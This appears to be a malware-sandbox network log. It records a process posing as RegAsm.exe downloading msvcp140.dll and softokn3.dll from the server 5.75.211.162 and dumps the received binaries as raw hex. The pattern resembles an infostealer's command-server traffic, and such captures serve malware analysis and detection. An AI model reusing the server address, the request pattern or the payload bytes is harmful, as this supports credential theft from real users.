00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-09-26 22:16:00 UTC	16384	IN	Data Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-09-26 22:16:00 UTC	16384	IN	Data Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
2024-09-26 22:16:00 UTC	16384	IN	Data Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-09-26 22:16:00 UTC	16384	IN	Data Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49745	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:01 UTC	197	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:02 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:01 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:16:01 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:16:02 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-26 22:16:02 UTC	16384	IN	Data Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
2024-09-26 22:16:02 UTC	16384	IN	Data Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-26 22:16:02 UTC	16384	IN	Data Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-09-26 22:16:02 UTC	16384	IN	Data Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-09-26 22:16:02 UTC	16384	IN	Data Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-09-26 22:16:02 UTC	16384	IN	Data Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-09-26 22:16:02 UTC	16384	IN	Data Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-09-26 22:16:02 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|
2024-09-26 22:16:02 UTC	16384	IN	Data Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49746	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:03 UTC	197	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:03 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:03 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:16:03 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:16:03 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-26 22:16:03 UTC	16384	IN	Data Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-09-26 22:16:03 UTC	16384	IN	Data Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
2024-09-26 22:16:03 UTC	16384	IN	Data Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-26 22:16:03 UTC	16384	IN	Data Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-09-26 22:16:03 UTC	16384	IN	Data Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
